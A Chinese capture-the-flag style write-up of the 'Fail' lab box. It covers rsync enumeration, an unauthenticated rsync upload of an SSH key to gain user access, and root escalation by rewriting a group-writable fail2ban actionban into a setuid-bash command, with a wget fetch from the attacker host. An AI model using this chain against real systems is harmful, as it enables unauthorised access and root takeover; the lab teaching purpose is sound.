OSCP靶场--Fail

OSCP靶场–Fail

考点(rsync未授权覆盖公钥+Fail2ban提权)

1.nmap扫描

##
┌──(root㉿kali)-[~/Desktop]
└─# nmap -sV -sC 192.168.153.126 -p- -Pn --min-rate 2500
Starting Nmap 7.92 ( https://nmap.org ) at 2024-04-12 23:34 EDT
Warning: 192.168.153.126 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.153.126
Host is up (0.14s latency).
Not shown: 64874 closed tcp ports (reset), 659 filtered tcp ports (no-response)
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 74:ba:20:23:89:92:62:02:9f:e7:3d:3b:83:d4:d9:6c (RSA)
|   256 54:8f:79:55:5a:b0:3a:69:5a:d5:72:39:64:fd:07:4e (ECDSA)
|_  256 7f:5d:10:27:62:ba:75:e9:bc:c8:4f:e2:72:87:d4:e2 (ED25519)
873/tcp open  rsync   (protocol version 31)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.83 seconds

2.user priv

2.1 rsync读取文件:

##
## 枚举共享模块:
┌──(root㉿kali)-[~/Desktop]
└─# nmap -sV --script "rsync-list-modules" -p 873 192.168.153.126
Starting Nmap 7.92 ( https://nmap.org ) at 2024-04-13 02:37 EDT
Nmap scan report for 192.168.153.126
Host is up (0.23s latency).PORT    STATE SERVICE VERSION
873/tcp open  rsync   (protocol version 31)
| rsync-list-modules: 
|_  fox                 fox homeService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.31 seconds############
## 枚举共享的fox目录:
┌──(root㉿kali)-[~/Desktop]
└─# rsync -av --list-only rsync://192.168.153.126/fox
receiving incremental file list
drwxr-xr-x          4,096 2021/01/21 09:21:59 .
lrwxrwxrwx              9 2020/12/03 15:22:42 .bash_history -> /dev/null
-rw-r--r--            220 2019/04/18 00:12:36 .bash_logout
-rw-r--r--          3,526 2019/04/18 00:12:36 .bashrc
-rw-r--r--            807 2019/04/18 00:12:36 .profile####
## 拷贝文件到kali:
┌──(root㉿kali)-[~/Desktop]
└─# rsync -av rsync://192.168.153.126/fox ./fox
receiving incremental file list
created directory ./fox
./
.bash_history -> /dev/null
.bash_logout
.bashrc
.profilesent 87 bytes  received 4,828 bytes  1,404.29 bytes/sec
total size is 4,562  speedup is 0.93┌──(root㉿kali)-[~/Desktop]
└─# cd fox           ┌──(root㉿kali)-[~/Desktop/fox]
└─# tree ./ -al              
./
├── .bash_history -> /dev/null
├── .bash_logout
├── .bashrc
└── .profile0 directories, 4 files###################
## 上面文件没有发现有效信息:
############ 尝试写公钥

2.2 生成秘钥对 rsync上传公钥

##
┌──(root㉿kali)-[~/.ssh]
└─# ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): 
/root/.ssh/id_rsa already exists.
Overwrite (y/n)? y
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /root/.ssh/id_rsa
Your public key has been saved in /root/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:wi6MXgWaQG35nP0zkaRVc8+x7Vx17Z6Z3NGa9NyIgjo root@kali
The key's randomart image is:
+---[RSA 3072]----+
| .. .     .o . .+|
|.  +     o  o o B|
|. . + o + .    =+|
| . o * o o    .++|
|  o   + S..  o.BX|
|   o o ..+. . +=*|
|  . + ..  o.     |
| . . .E          |
|  .    .         |
+----[SHA256]-----+################
##
┌──(root㉿kali)-[~/.ssh]
└─# cat id_rsa.pub >> authorized_keys┌──(root㉿kali)-[~/.ssh]
└─# ls -al
total 32
drwx------  2 root root 4096 Apr 13 03:03 .
drwx------ 27 root root 4096 Apr 13 02:36 ..
-rw-r--r--  1 root root  563 Apr 13 03:03 authorized_keys
-rw-------  1 root root 2590 Apr 13 02:58 id_rsa
-rw-r--r--  1 root root  563 Apr 13 02:58 id_rsa.pub
-rw-------  1 root root 4458 Apr 13 03:02 known_hosts
-rw-------  1 root root 3952 Apr 12 04:17 known_hosts.old###
## 上传公钥:
┌──(root㉿kali)-[~/.ssh]
└─# rsync -av /root/.ssh/ rsync://192.168.153.126/fox/.ssh
sending incremental file list
./
authorized_keys
known_hostssent 1,132 bytes  received 99 bytes  223.82 bytes/sec
total size is 12,126  speedup is 9.85###############
# 私钥访问:
┌──(root㉿kali)-[~/.ssh]
└─# ssh -i id_rsa fox@192.168.153.126                     
Linux fail 4.19.0-12-amd64 #1 SMP Debian 4.19.152-1 (2020-10-18) x86_64The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
$ whoami
fox
$ 

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

3. root priv[Fail2ban提权]

##
######################
## linpeas枚举:
╔══════════╣ Interesting GROUP writable files (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files                                                    Group fail2ban:                                                                                                                    
/etc/fail2ban/action.d                                                                                                               
/etc/fail2ban/action.d/firewallcmd-ipset.conf
/etc/fail2ban/action.d/nftables-multiport.conf
/etc/fail2ban/action.d/firewallcmd-multiport.conf
/etc/fail2ban/action.d/mail-whois.conf
/etc/fail2ban/action.d/ufw.conf
#)You_can_write_even_more_files_inside_last_directory##########################
## pspy64监控定时任务:
fox@fail:/tmp$ wget http://192.168.45.195/pspy64
fox@fail:/tmp$ chmod +x ./pspy64
fox@fail:/tmp$ ./pspy64## 一分钟执行一次的定时任务python3脚本:
2024/04/13 03:35:02 CMD: UID=0     PID=14259  | /usr/bin/python3 /usr/bin/fail2ban-server -xf start ####
## 查看脚本:对脚本无写权限
fox@fail:/tmp$ ls -l /usr/bin/fail2ban-server
-rwxr-xr-x 1 root root 1419 Sep 23  2018 /usr/bin/fail2ban-server
fox@fail:/tmp$ cat /usr/bin/fail2ban-server
#!/usr/bin/python3
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: t -*-
# vi: set ft=python sts=4 ts=4 sw=4 noet :# This file is part of Fail2Ban.
#
# Fail2Ban is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# Fail2Ban is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Fail2Ban; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA."""
Fail2Ban reads log file that contains password failure report
and bans the corresponding IP addresses using firewall rules.This tools starts/stops fail2ban server or does client/server communication,
to change/read parameters of the server or jails."""__author__ = "Fail2Ban Developers"
__copyright__ = "Copyright (c) 2004-2008 Cyril Jaquier, 2012-2014 Yaroslav Halchenko, 2014-2016 Serg G. Brester"
__license__ = "GPL"from fail2ban.client.fail2banserver import exec_command_line, sysif __name__ == "__main__":exec_command_line(sys.argv)###############
##
fox@fail:/tmp$ id
uid=1000(fox) gid=1001(fox) groups=1001(fox),1000(fail2ban)####################################
## 修改配置文件:/etc/fail2ban/action.d/iptables-multiport.conf 最后actionban部分:
fox@fail:/tmp$ wget http://192.168.45.195/1.txt -O /etc/fail2ban/action.d/iptables-multiport.conf
--2024-04-13 04:24:13--  http://192.168.45.195/1.txt
Connecting to 192.168.45.195:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 498 [text/plain]
Saving to: ‘/etc/fail2ban/action.d/iptables-multiport.conf’/etc/fail2ban/actio 100%[===================>]     498  --.-KB/s    in 0s      utime(/etc/fail2ban/action.d/iptables-multiport.conf): Operation not permitted
2024-04-13 04:24:14 (112 MB/s) - ‘/etc/fail2ban/action.d/iptables-multiport.conf’ saved [498/498]cat /etc/fail2ban/action.d/iptables-multiport.conf                              ls -al
# Fail2Ban configuration file
#
# Author: Cyril Jaquier
# Modified by Yaroslav Halchenko for multiport banning
#[INCLUDES]before = iptables-common.conf[Definition]# Option:  actionstart
# Notes.:  command executed once at the start of Fail2Ban.
# Values:  CMD
#
actionstart = <iptables> -N f2b-<name><iptables> -A f2b-<name> -j <returntype><iptables> -I <chain> -p <protocol> -m multiport --dports <port> 
actionban = cp /bin/bash /tmp && chmod 4755 /tmp/bash
fox@fail:/tmp$ ls -al
total 3880
drwxrwxrwt  9 root root    4096 Apr 13 03:31 .
drwxr-xr-x 18 root root    4096 Nov 19  2020 ..
drwxrwxrwt  2 root root    4096 Mar 23 05:54 .font-unix
drwxrwxrwt  2 root root    4096 Mar 23 05:54 .ICE-unix
-rwxr-xr-x  1 fox  fox   830030 Jun  8  2023 linpeas.sh
-rwxr-xr-x  1 fox  fox  3104768 Oct 15 16:07 pspy64
drwx------  3 root root    4096 Mar 23 05:54 systemd-private-ed6103b5cc954113b252ce1682f5f3f9-systemd-timesyncd.service-YHAVrn
drwxrwxrwt  2 root root    4096 Mar 23 05:54 .Test-unix
drwx------  2 root root    4096 Mar 23 05:54 vmware-root_307-2117352714
drwxrwxrwt  2 root root    4096 Mar 23 05:54 .X11-unix
drwxrwxrwt  2 root root    4096 Mar 23 05:54 .XIM-unix
fox@fail:/tmp$ ls -al
total 5024
drwxrwxrwt  9 root root    4096 Apr 13 04:25 .
drwxr-xr-x 18 root root    4096 Nov 19  2020 ..
-rwsr-xr-x  1 root root 1168776 Apr 13 04:26 bash
drwxrwxrwt  2 root root    4096 Mar 23 05:54 .font-unix
drwxrwxrwt  2 root root    4096 Mar 23 05:54 .ICE-unix
-rwxr-xr-x  1 fox  fox   830030 Jun  8  2023 linpeas.sh
-rwxr-xr-x  1 fox  fox  3104768 Oct 15 16:07 pspy64
drwx------  3 root root    4096 Mar 23 05:54 systemd-private-ed6103b5cc954113b252ce1682f5f3f9-systemd-timesyncd.service-YHAVrn
drwxrwxrwt  2 root root    4096 Mar 23 05:54 .Test-unix
drwx------  2 root root    4096 Mar 23 05:54 vmware-root_307-2117352714
drwxrwxrwt  2 root root    4096 Mar 23 05:54 .X11-unix
drwxrwxrwt  2 root root    4096 Mar 23 05:54 .XIM-unix
fox@fail:/tmp$ ./bash -p
bash-5.0# id
uid=1000(fox) gid=1001(fox) euid=0(root) groups=1001(fox),1000(fail2ban)
bash-5.0# cat /root/proof.txt
67881fb0ba414792fb7abf861095ea55
bash-5.0# 

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
Fail2ban提权:
在这里插入图片描述
hydra制造破解失败触发Fail2Ban禁止ip,触发actionban命令执行:

在这里插入图片描述
获得rootshell:
在这里插入图片描述

4.总结:

## pentesting-rsync
https://book.hacktricks.xyz/network-services-pentesting/873-pentesting-rsync
## writeup:
https://dylanrholloway.com/proving-grounds-fail-write-up/
## fail2ban提权:
https://juggernaut-sec.com/fail2ban-lpe/

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/813428.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

招生管理|基于SprinBoot+vue的招生管理系统系统设计与实现(源码+数据库+文档)

招生管理目录 基于SprinBootvue的招生管理系统设计与实现 一、前言 二、系统设计 三、系统功能设计 前台 后台 教师权限 学生权限&#xff1a; 四、数据库设计 五、核心代码 六、论文参考 七、最新计算机毕设选题推荐 八、源码获取&#xff1a; 博主介绍&#xff…

大数据------JavaWeb------JDBC(完整知识点汇总)

JDBC 定义 全称为Java数据库连接&#xff08;Java DataBase Connectivity&#xff09;&#xff1a;是使用java语句来操作所有关系型数据库的一套API JDBC本质 它是官方定义的一套操作所有关系型数据库的规则&#xff08;即接口&#xff09;&#xff0c;各个数据库厂商会去实现…

VLC-Qt实现简单的视频播放器

VLC-Qt是一个结合了Qt应用程序和libVLC的免费开源库。它提供了用于媒体播放的核心类&#xff0c;以及用于快速开发媒体播放器的GUI类。由于集成了整个libVLC&#xff0c;VLC-Qt具备了libVLC的所有特性&#xff0c; 例如&#xff1a;libVLC实例和播放器、单个文件和列表播放、音…

.NET i18n 多语言支持与国际化

环境 WIN10 VS2022 .NET8 1.&#x1f44b;创建项目 2.&#x1f440;创建Resources Controllers HomeController.en.resx HomeController.fr.resx HomeController.zh.resx 3.&#x1f331;Program.cs添加国际化支持 // 添加国际化支持 builder.Services.AddLocalization(…

6.Hexo标签插件和资产文件夹

标签插件 标签插件&#xff0c;基本上是只是一些小的代码片段&#xff0c;可以将他们添加到markdown文件中 以便添加特定的代码&#xff0c;不需要编写复杂或混乱的HTML 当很多时候想要在markdown页面添加一些特殊元素&#xff0c;通常必须使用HTML 如果不想这么用HTML&#…

CSS特效---百分比加载特效

1、演示 2、一切尽在代码中 <!DOCTYPE html> <html lang"en"><head><meta charset"UTF-8" /><meta name"viewport" content"widthdevice-width, initial-scale1.0" /><title>Document</title&…

公众号文章如何添加多个附件?

在公众号分享一些文档给粉丝下载&#xff0c;有那么几种方式。比如把文档转成超链接&#xff0c;放在公众号的“阅读原文”处&#xff0c;或者把文件转成二维码&#xff0c;贴在公众号文章里面。这两种方式其实都需要先把文件转成超链接&#xff08;网页链接&#xff09;&#…

【目标检测数据集】VOC2007 数据集介绍

一、介绍 VOC 数据是 PASCAL VOC Challenge 用到的数据集&#xff0c;官网&#xff1a;http://host.robots.ox.ac.uk/pascal/VOC/ 备注&#xff1a;VOC数据集常用的均值为&#xff1a;mean_RGB(122.67891434, 116.66876762, 104.00698793) Pytorch 上通用的数据集的归一化指…

OVITO-2.9版本

关注 M r . m a t e r i a l , \color{Violet} \rm Mr.material\ , Mr.material , 更 \color{red}{更} 更 多 \color{blue}{多} 多 精 \color{orange}{精} 精 彩 \color{green}{彩} 彩&#xff01; 主要专栏内容包括&#xff1a; †《LAMMPS小技巧》&#xff1a; ‾ \textbf…

系统架构最佳实践 -- 一般优惠券平台系统架构设计

优惠券是商城的一种基础的营销工具&#xff0c;在目前c端用户对于电子优惠券已经非常熟悉的情况下&#xff0c;一般自营商城的营销活动系统&#xff0c;都是从优惠券开始搭建。 一、名词定义 基于个人理解&#xff0c;为方便表述&#xff0c;首先对可能产生歧义的名词进行如下…

ubuntu 设置 root 用户密码,创建新用户并赋权限

ubuntu 设置 root 用户密码&#xff0c;创建新用户并赋权限 在适用于 Linux 的 Windows 子系统上运行 Linux GUI 应用&#xff0c; 安装 Ubuntu-20.04 系统&#xff0c;新安装好的系统&#xff0c;设置用户名密码时&#xff0c; root 用户密码默认为空&#xff0c;这时需要设置…

信息学奥赛一本通T1442-小木棍【dfs】

信息学奥赛一本通T1442-小木棍 - C语言网 (dotcpp.com) #include <iostream> #include <algorithm> #include <cmath> #include <cstring> using namespace std; const int N1e5100; int n; int res1e9; int a[N],p0,sd0; bool vis[N]; bool dfs(int i…

【R语言】绘制标准地图(指北针,比例尺,图例)

在绘制地图时&#xff0c;我们一般都是利用“ArcGIS”"MapGIS"等专业软件进行手动操作。这样制作的地图自定义的效果强&#xff0c;我们可以随意调换地图的各种元素&#xff0c;但是今天本文要将的是如何使用R语言绘制具备地图三要素的精美地图&#xff0c;当然代码绘…

Android 14.0 SystemUI修改状态栏电池图标样式为横屏显示

1.概述 在14.0的系统rom产品定制化开发中,对于原生系统中SystemUId 状态栏的电池图标是竖着显示的,一般手机的电池图标都是横屏显示的 可以觉得样式挺不错的,所以由于产品开发要求电池图标横着显示和手机的样式一样,所以就得重新更换SystemUI状态栏的电池样式了 如图: 2.S…

volatile是如何禁止指令进行重排序的

Further Reading &#xff1a; 内存屏障类型介绍&#xff08;StoreStore&#xff0c;StoreLoad&#xff0c;LoadLoad&#xff0c;LoadStore&#xff09; Further Reading &#xff1a; 什么是指令重排 重排序分为编译器重排序和处理器重排序。 为了实现volatile内存语义&#x…

【计算机毕业设计】人事管理系统——后附源码

&#x1f389;**欢迎来到我的技术世界&#xff01;**&#x1f389; &#x1f4d8; 博主小档案&#xff1a; 一名来自世界500强的资深程序媛&#xff0c;毕业于国内知名985高校。 &#x1f527; 技术专长&#xff1a; 在深度学习任务中展现出卓越的能力&#xff0c;包括但不限于…

70 个常用的GIS Python 库

由于其多功能性、广泛的库生态系统和用户友好的语法&#xff0c;Python 已成为地理信息系统 (GIS) 和遥感领域的主导语言。这个 70 个地理空间 Python 库的汇编展示了可用于 GIS 和遥感数据处理和分析的丰富工具包。 Python 在 GIS 中的重要性源于它处理复杂地理空间数据的能力…

HTML快速入门

目录 一、HTML基础 1、HTML是什么&#xff1f; 2、认识 HTML 标签 3、HTML文件的基本结构 二、HTML快速开发 三、HTML常见标签 1、标题标签&#xff1a;h1~h6 2、段落标签&#xff1a;p 3、换行标签&#xff1a;br 4、图片标签&#xff1a;img 5、超链接&#xff1a…

Python单元测试框架—pytest常用测试报告类型

&#x1f345; 视频学习&#xff1a;文末有免费的配套视频可观看 &#x1f345; 关注公众号【互联网杂货铺】&#xff0c;回复 1 &#xff0c;免费获取软件测试全套资料&#xff0c;资料在手&#xff0c;涨薪更快 先前博客有介绍pytest测试框架的安装及使用&#xff0c;现在来聊…

Python赋能AI数据分析开启人工智能新时代

文章目录 一、Python是办公自动化的重要工具二、Python是提升职场竞争力的利器三、Python是企业数字化的重要平台四、Python是AI发展的重要通道之一《编程菜鸟学Python数据分析》编辑推荐内容简介作者简介目录前言为什么要写这本书读者对象如何阅读本书 随着我国企业数字化和信…